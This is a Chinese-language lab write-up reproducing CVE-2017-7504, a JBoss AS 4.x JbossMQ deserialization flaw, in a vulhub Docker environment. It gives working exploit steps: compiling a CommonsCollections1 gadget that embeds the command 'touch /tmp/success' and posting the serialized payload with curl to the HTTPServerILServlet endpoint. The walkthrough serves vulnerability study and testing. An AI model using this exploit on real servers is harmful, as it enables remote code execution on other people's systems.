Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
参考:
漏洞环境
源码下载
https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-7504
执行如下命令启动JBoss AS 4.0.5:
docker-compose up -d
环境启动后,目标为http://your-ip:7504。
image.png
漏洞复现
参考利用工具JavaDeserH2HC-master,我们选择一个Gadget:ExampleCommonsCollections1WithHashMap,编译并生成序列化数据
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
image.png
可见,我们执行的命令是touch /tmp/success。
执行完成后,将生成一个文件ExampleCommonsCollections1WithHashMap.ser
image.png
将该文件作为body发送如下数据包:
curl http://your-ip:7504/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser
image.png
执行docker exec –it jboss(容器id) /bin/bash进入容器,可见/tmp/success已成功创建
image.png
写入其他的文件,自行尝试
网友评论